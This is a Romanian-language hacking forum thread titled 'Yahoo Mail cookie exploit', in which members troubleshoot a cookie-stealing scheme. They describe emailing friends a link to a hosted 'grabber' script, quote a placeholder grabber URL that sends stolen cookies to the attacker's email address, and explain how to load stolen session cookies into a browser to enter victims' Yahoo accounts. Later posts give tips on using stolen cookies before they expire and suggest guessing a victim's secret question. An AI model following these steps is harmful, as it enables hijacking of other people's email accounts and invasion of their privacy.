Jump to content
Guest Nemessis

Yahoo Mail cookie exploit

Recommended Posts

Ori is eu batut in cap , ori e cookie;u prost :@:uiatti care e problema am modificat tot, am uploadat grabberul tot, am trmis mail la cativa preteni de'ai mei , au dat click ,miau venit cookie'urile.Pana aici totul fain frumos, iau cookie'ul si il bag in browserul pe care l'a postat Nemessis , si surpriza, la unele imi arat id'ul si im cere parola, la altele im cere si id'ul si parola :@ ,am gresit eu cu ceva pe aici sau cum :@ , ca de 2 zile numa asta am facut, nu este alta metoda prin care sa abtin acces la mailul lui cu ajutorul cookie'ului ????

Link to comment
Share on other sites

YceFire wrote: Ori is eu batut in cap , ori e cookie;u prost :@:uiatti care e problema am modificat tot, am uploadat grabberul tot, am trmis mail la cativa preteni de'ai mei , au dat click ,miau venit cookie'urile.Pana aici totul fain frumos, iau cookie'ul si il bag in browserul pe care l'a postat Nemessis , si surpriza, la unele imi arat id'ul si im cere parola, la altele im cere si id'ul si parola :@ ,am gresit eu cu ceva pe aici sau cum :@ , ca de 2 zile numa asta am facut, nu este alta metoda prin care sa abtin acces la mailul lui cu ajutorul cookie'ului ????

same here :?

Link to comment
Share on other sites

virusss wrote: ...ma so mai scris de n ori...SCHIMBATI HOSTUL...

...as.ro , lx.ro si aste free merg DAR NU INTOTDEAUNA...sunt INSTABILE OK???...

...scarto tu zici ca daca pui alt script iti vine emailul...ok bun!....dar in "Cookie Script" ai pus emailul tau si ai schimbat acolo siteul ???


Citat:
<'http://www.site.com/grabber.php?email=mailultau@yahoo.com

...deci aici in script ai pus in loc de site.com siteul unde sta grabber.php pus de tine (si vezi ca daca pe site ai pus index.php atunci pune si acolo tot site.com/index.php nu grabber.php....(stiu io pe cineva care o facut asa)...Capisci????si ai schimbat cu mailul unde vrei sa iti vina Cookieul???

...daca nu ai facut asa ..atunci fa...si daca ai facut atunci mai reciteste odata...ca asta inca mai merge...

Am modificat tot ce era de modificat .. si tot nu vine mail .. OK .. mergem pe prima varianta, nu e bun hostu. Am host si de la ISPu meu, si nici ala nu merge ... :@

Link to comment
Share on other sites

Scarto wrote:
virusss wrote: ...ma so mai scris de n ori...SCHIMBATI HOSTUL...

...as.ro , lx.ro si aste free merg DAR NU INTOTDEAUNA...sunt INSTABILE OK???...

...scarto tu zici ca daca pui alt script iti vine emailul...ok bun!....dar in "Cookie Script" ai pus emailul tau si ai schimbat acolo siteul ???


Citat:
<'http://www.site.com/grabber.php?email=mailultau@yahoo.com

...deci aici in script ai pus in loc de site.com siteul unde sta grabber.php pus de tine (si vezi ca daca pe site ai pus index.php atunci pune si acolo tot site.com/index.php nu grabber.php....(stiu io pe cineva care o facut asa)...Capisci????si ai schimbat cu mailul unde vrei sa iti vina Cookieul???

...daca nu ai facut asa ..atunci fa...si daca ai facut atunci mai reciteste odata...ca asta inca mai merge...

Am modificat tot ce era de modificat .. si tot nu vine mail .. OK .. mergem pe prima varianta, nu e bun hostu. Am host si de la ISPu meu, si nici ala nu merge ... :@

EDIT

OK .. am rezolvat, imi vine si mail cu cookie ... dar e alta problema acu ... nu merge programu trimis de nemessis pentru a deschide cookie-urile ... Of ... :D

Link to comment
Share on other sites

Scarto wrote: OK .. am rezolvat, imi vine si mail cu cookie ... dar e alta problema acu ... nu merge programu trimis de nemessis pentru a deschide cookie-urile ... Of ... :D

nu merge? in ce sens ?nu se deschide sau bagi cookie in el, dai open si nu deschide mail-ul?

daca nu se deschide instaleaza Microsoft NET Framework Version 2.0

Link to comment
Share on other sites

SCUZE pentru dublu post ... din greseala !

Cat despre program .. se deschide, da nu se logheaza singur in mail ... adica se deschide mail.yahoo.com .. atat :)

Am incercat si cu Cookie editor din firefox, dar mie nu mi-a venit T: la cookie si la Y mi-a venit o linie cam mica .. in tutorialu video vad ca e una mai mare :)

Care sa fie problema?

Link to comment
Share on other sites

...ma daca citeati atent fiecare pagina de aici...vedeati raspunul la intrebari...dar mai zic io acum...

...ca sa va fie mai usor folositi Browserul OPERA (dupa parerea mea ii cel mai simplu) si merge + ca are integrat Cookie Editor.(daca citeati tot vedeati ca Sad Dreamer o zis asta)...

...inlocuiti tot ce se poate...ce litere aveti voi si ce litere va vine in Cookie...NU trebuie neaparat sa fie 100% literele de la voi din Browser corespunzatoare cu ceea ce va vine in mail. Daca nu va merge nici asa...mai cititi cu ATENTIE in Thread ca SIGUR ii raspunsul deja DAT...ca si acum...

Link to comment
Share on other sites

...1. Ai incercat cu opera???

...2. Cum ai inlocuit Cookie-ul??? da detalii...ca poate nu faci bine...dintrun Cookie

B=khdfushciusu5423bkbuj; ...sper ca nu iei tot....iei numa ce ii dupa = si pana la ; ...dar mai bine zi tu mai detaliat ce faci ca sa se stie mai clar...sau trimitemi cookieul in pm si iti spun io daca merge sau nu...

Link to comment
Share on other sites

OK .. am avansat .. vine mail cu cookie cu tot ... totul OK ... Dar .. bag cookie in firefox si nu merge :( Cu browseru postat de nemessis merge, dar cere parola... apare useru acolo si cere parola..

EDIT

Ce mi s-a intamplat =))

Facuse unu nush care pe aici pagina special ptr cookie cu hi5 ... cu friend request si nush ce .. si faceam teste pe mailu' meu ... si am dat un click pe Accept friend ... ma redirectioneaza la hi5 si deodata ma trezesc ca-s logat in contu' lu' nush care =))

untitled.jpg

Uite is hacker fara sa vreau =))

Asa arata pagina inainte ... acu ... arata cam asa ...

 [url]http://www.hi5.com/friend/profile/displaySameProfile.do?userid=99120876[/url] 

Link to comment
Share on other sites

Guest Nemessis

Cookie e valabil doar 24 ore. Daca omul isi schimba parola sau trec acele 24 ore o sa va ceara parola. Stergeti vechile cookies din browser inainte sa il folositi pe cel furat. Dati refresh in firefox dupa ce ati bagat cookie fara sa inchideti firefox inainte. O sa cer sa se inchida threadul pentru ca nu vad rostul la 1000 de intrebari identice cand aveti tot ce va trebuie pus la dispozitie inclusiv tutorial video. Mai mult imi fac nervi cand vad un tampit care intreaba "si cum folosesc cookie astea" cand scrie pe tot forumul si pe pagina pe care a postat cum sa faca. Scumbag.

Link to comment
Share on other sites

dak e de la yahoo ..mai merge putin dar tre sa mai afli niste infoz... dupa ce vezi mai toate datele iti ramane de aflat rasp la intrebarea secreta.. poate poate

sau doar dak ai sansa sa gasesti vreu'n mail ne sters.. cum ca victima si-ar fii schimbat parola ... in...:D

bafta!

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.



×
×
  • Create New...